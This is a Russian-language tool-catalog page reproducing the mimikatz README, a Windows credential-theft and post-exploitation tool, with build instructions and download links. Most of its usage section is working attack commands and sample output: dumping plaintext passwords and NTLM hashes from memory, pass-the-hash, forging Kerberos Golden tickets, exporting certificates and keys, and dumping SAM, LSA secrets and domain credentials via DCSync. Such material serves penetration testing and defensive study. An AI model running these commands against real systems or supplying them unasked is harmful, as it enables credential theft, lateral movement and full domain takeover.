Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
mimikatz — Небольшой инструмент для работы с безопасностью Windows | Kitploit
Инструменты/GitHubGitHub/gentilkiwi/mimikatz
Взлом паролейФреймворки для пентестаФреймворки для эксплойтовАтаки на ПаролиМеханизмы персистентностиЭксплуатацияАнализ хэшейЛатеральное перемещениеПост-эксплуатацияТестирование на ПроникновениеАутентификацияRed Teaming
21.8k4.2k574 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Разработка Полезной Нагрузки
Топ в Эксплуатация №12
Топ в Фреймворки для эксплойтов №15
Топ в Анализ хэшей №20
Топ в Латеральное перемещение №20
Топ в Атаки на Пароли №9
Топ в Взлом паролей №9
Топ в Фреймворки для пентеста №15
Топ в Механизмы персистентности №11
Топ в Пост-эксплуатация №3
Топ в Red Teaming №10
GitHubgentilkiwi/mimikatz

mimikatz

Небольшой инструмент для работы с безопасностью Windows

РепозиторийСайт

mimikatz

mimikatz — это инструмент, который я создал для изучения C и проведения экспериментов с безопасностью Windows.

Теперь он хорошо известен тем, что извлекает из памяти пароли в открытом виде, хэши, PIN-коды и билеты Kerberos. mimikatz также может выполнять pass-the-hash, pass-the-ticket или создавать Golden tickets.

root@kitploit:~
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

Но это ещё не всё! Crypto, Terminal Server, Events, ... много информации в вики GitHub https://github.com/gentilkiwi/mimikatz/wiki или на https://blog.gentilkiwi.com (на французском, да).

Если вы не хотите собирать его, бинарники доступны на https://github.com/gentilkiwi/mimikatz/releases

Быстрое использование

root@kitploit:~
log
privilege::debug

sekurlsa

root@kitploit:~
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

root@kitploit:~
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

root@kitploit:~
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault и lsadump

root@kitploit:~
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Сборка

mimikatz представляет собой решение Visual Studio и драйвер WinDDK (для основных операций необязателен), поэтому необходимы:

  • для mimikatz и mimilib : Visual Studio 2010, 2012 или 2013 для настольных приложений (2013 Express для настольных приложений бесплатна и поддерживает x86 и x64 - http://www.microsoft.com/download/details.aspx?id=44914)
  • для драйвера mimikatz, mimilove (и платформы ddk2003): Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

mimikatz использует SVN для управления версиями, но теперь доступен и с GIT! Вы можете использовать любые инструменты для синхронизации, даже встроенный GIT в Visual Studio 2013 =)

Синхронизация!

  • URL GIT: https://github.com/gentilkiwi/mimikatz.git
  • URL SVN: https://github.com/gentilkiwi/mimikatz/trunk
  • ZIP-файл: https://github.com/gentilkiwi/mimikatz/archive/master.zip

Сборка решения

  • После открытия решения выполните Build / Build Solution (можно изменить архитектуру)
  • mimikatz теперь собран и готов к использованию! (Win32 / x64 и даже ARM64, если повезёт)
    • может возникнуть ошибка MSB3073 с сообщением о _build_.cmd и mimidrv, это связано с тем, что драйвер не может быть собран без Windows Driver Kit 7.1 (WinDDK), но mimikatz и mimilib собираются нормально.

ddk2003

С этой опциональной платформой MSBuild вы можете использовать инструменты сборки WinDDK и среду выполнения по умолчанию msvcrt (меньшие бинарники, без зависимостей).

Для этой опциональной платформы обязательны Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 и Visual Studio 2010, даже если вы планируете затем использовать Visual Studio 2012 или 2013.

Следуйте инструкциям:

  • https://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
  • https://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

Непрерывная интеграция

Проект mimikatz доступен на AppVeyor - https://ci.appveyor.com/project/gentilkiwi/mimikatz

Его статус: AppVeyor CI status

Лицензия

Лицензия CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

mimikatz требует кофе для разработки:

  • PayPal: https://www.paypal.me/delpy/

Автор

  • Бенджамин DELPY gentilkiwi, вы можете связаться со мной в Twitter ( @gentilkiwi ) или по почте ( benjamin [at] gentilkiwi.com )
  • Функции DCSync и DCShadow в модуле lsadump были написаны в соавторстве с Vincent LE TOUX, вы можете связаться с ним по почте ( vincent.letoux [at] gmail.com ) или посетить его сайт ( http://www.mysmartlogon.com )

Это личная разработка, пожалуйста, уважайте её философию и не используйте для плохих вещей!

Скачать инструмент